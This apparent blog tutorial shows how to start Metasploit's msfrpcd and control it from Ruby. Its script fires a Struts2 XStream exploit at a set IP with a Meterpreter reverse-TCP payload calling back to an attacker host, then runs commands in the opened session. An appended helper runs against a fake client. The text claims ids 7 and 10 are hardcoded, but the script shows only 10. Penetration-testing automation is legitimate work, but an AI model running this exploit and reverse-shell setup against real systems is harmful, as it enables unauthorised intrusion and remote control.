Ruby | Controlling Metasploit Remotely using RPC API in Ruby
While working on something, I wanted to automate exploiting a vulnerability because of the repetitive nature of the task. There are several long-standing ways to do this, such as executing msfconsole directly or building a resource (rc) file and feeding it to msfcli. All of these work, but none is a very pragmatic way to deal with Metasploit. It's like using an application as an end-user rather than as a developer, so to speak.
So the main idea of this post is to use Metasploit as a service: an RPC service that you send commands to and receive responses from, exactly as if you were sitting at msfconsole, except that every command you send and every response you receive goes through an RPC call. This, for example, lets multiple custom-made agents work against the same centralized instance and avoids the need to have Metasploit installed on your own machine.
Running Metasploit RPC API Server
Basically, there are two main ways to run the Metasploit RPC service: the first uses the msfconsole command, the second uses the msfrpcd command. The second is the one we'll use for the rest of this post, since I'm trying to steer you away from msfconsole as much as possible.
Using 'msfconsole' Console
Once msfconsole is running, load the MSGRPC plugin (load msgrpc). By default it starts the server on port 55552 with msf as the username and a random password.
Using 'msfrpcd' Daemon
The Metasploit framework also comes with a utility called msfrpcd that runs the service on its own. Note from the startup banner below that it listens on 0.0.0.0 by default, so pass -a 127.0.0.1 unless clients on other hosts genuinely need to reach it: anyone who can reach the port and knows the credentials can drive every job and session.
$ msfrpcd -U <USERNAME> -P <PASSWORD>
-a <opt> - The local hostname that the server listens on.
-p <opt> - The local port that the server listens on (default: 55553).
-U <opt> - The username to access the server.
-P <opt> - The password to access the server.
-S - Enables or disables SSL on the RPC socket. (default: true)
-f - Runs the daemon in the foreground.
$ msfrpcd -U cool -P looc -f
[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...
[*] MSGRPC ready at 2018-11-22 15:40:41 +0300.
Connecting to Metasploit RPC API
Using 'msfrpc' Client
The fastest way to connect to Metasploit's RPC server is the framework's own client, the msfrpc utility, which ships with Metasploit by default if you are using the Metasploit nightly build package.
$ msfrpc -h
Usage: msfrpc <options>
OPTIONS:
-P <opt> Specify the password to access msfrpcd
-S Disable SSL on the RPC socket
-U <opt> Specify the username to access msfrpcd
-a <opt> Connect to this IP address
-h Help banner
-p <opt> Connect to the specified port instead of 55553
To connect to your server:
$ msfrpc -U cool -P looc -a localhost
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls
This drops you into an IRB shell with an rpc object that already holds a logged-in session. Inspect the rpc object to make sure you're good to go.
Using 'msfrpc-client' Gem
The same client is available to your own scripts through the msfrpc-client gem. The script below logs in, inspects a module, runs it as a job and then talks to the resulting session, all over the API.
#!/usr/bin/env ruby
# Author:
#   Sabri | @KINGSABRI
# Description:
#   How to use the MSFRPC API
# Requirements:
#   gem install msfrpc-client
#
require 'msfrpc-client'

user = 'cool'
pass = 'looc'
# Same host/port/SSL settings msfrpcd was started with; the API endpoint is /api/.
opts = { host: '127.0.0.1', port: 55553, uri: '/api/', ssl: true }
rpc  = Msf::RPC::Client.new(opts)
rpc.login(user, pass)                     # fetches and stores the auth token used by every later call

# Basic information about the instance
rpc.call('core.version')
rpc.call('core.module_stats')

# Inspect a module before running it
rpc.call('module.info',    'exploit', 'multi/http/struts2_rest_xstream')
rpc.call('module.options', 'exploit', 'multi/http/struts2_rest_xstream')

# Execute a module as a background job
exp_opts = {
  'RHOST'     => '192.168.100.62',
  'RPORT'     => 80,
  'TARGETURI' => '/orders/3',
  'SSL'       => false,
  'SRVHOST'   => '0.0.0.0',
  'SRVPORT'   => 8081,
  'UserAgent' => 'Black Hat Ruby',
  'target'    => 4                        # 'Linux (Dropper)'
}
pay_opts = {
  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
  'LHOST'   => '192.168.100.10',
  'LPORT'   => 9911
}
job = rpc.call('module.execute', 'exploit', 'multi/http/struts2_rest_xstream', exp_opts.merge(pay_opts))

# Watch the job and the sessions it opens
rpc.call('job.list')
rpc.call('job.info', job['job_id'])       # module.execute returns { 'job_id' => ..., 'uuid' => ... }
rpc.call('session.list')
# 10 is the session id shown by session.list for the session the job opened
rpc.call('session.meterpreter_write', 10, 'sysinfo')
rpc.call('session.meterpreter_read', 10)
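The script above addresses the job and the session by the literal ids 7 and 10 that happened to show up in the author's instance. The wrapper below is an added example, not part of the original post or of the msfrpc-client gem: it takes the job_id that module.execute returns, polls job.list until the job finishes, and reports only the sessions that appeared meanwhile. It assumes nothing beyond a client object with a call method like Msf::RPC::Client's; the FakeRpc class, the ids and the RHOST value are constructed so the example runs without a live msfrpcd.

```ruby
# Added example (not from the original post): wraps any client that responds to
# #call like Msf::RPC::Client, uses the job_id module.execute returns instead of
# a hardcoded id, waits until that job leaves job.list, and reports only the
# sessions that appeared while it ran.
class MsfJobRunner
  def initialize(rpc, poll: 0.5)
    @rpc, @poll = rpc, poll
  end
  # Ids arrive as Integer or String depending on the transport; compare as strings.
  def ids(method)
    @rpc.call(method).keys.map(&:to_s)
  end
  # Returns [job_id, ids of sessions created while the job ran].
  def run_and_wait(mtype, mname, opts, timeout: 60)
    before = ids('session.list')
    result = @rpc.call('module.execute', mtype, mname, opts)
    job_id = result['job_id'] || raise("module.execute returned no job_id: #{result.inspect}")
    deadline = Time.now + timeout
    while ids('job.list').include?(job_id.to_s)
      raise "job #{job_id} still running after #{timeout}s" if Time.now > deadline
      sleep @poll
    end
    [job_id, ids('session.list') - before]
  end
end

# Constructed stand-in for Msf::RPC::Client so this runs without a live msfrpcd:
# the job is gone by the second job.list poll and one new session (id 10) appears.
class FakeRpc
  def initialize
    @polls, @job, @sessions = 0, nil, { 3 => { 'type' => 'shell' } }
  end
  def call(method, *_args)
    case method
    when 'module.execute' then @job = 7; { 'job_id' => 7, 'uuid' => 'constructed-uuid' }
    when 'session.list'   then @sessions
    when 'job.list'
      if (@polls += 1) >= 2 && @job
        @job = nil
        @sessions[10] = { 'type' => 'meterpreter' }
      end
      @job ? { @job.to_s => 'Exploit: multi/http/struts2_rest_xstream' } : {}
    else raise ArgumentError, "unexpected RPC method #{method}"
    end
  end
end

def demo
  MsfJobRunner.new(FakeRpc.new, poll: 0).run_and_wait('exploit', 'multi/http/struts2_rest_xstream', { 'RHOST' => '198.51.100.20' })
end
```

With a real server, replace FakeRpc.new with the logged-in Msf::RPC::Client from the script above.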
Finally, I find this an awesome way to use Metasploit in ways you never thought would be that easy from your own code. I'll leave the rest to your imagination.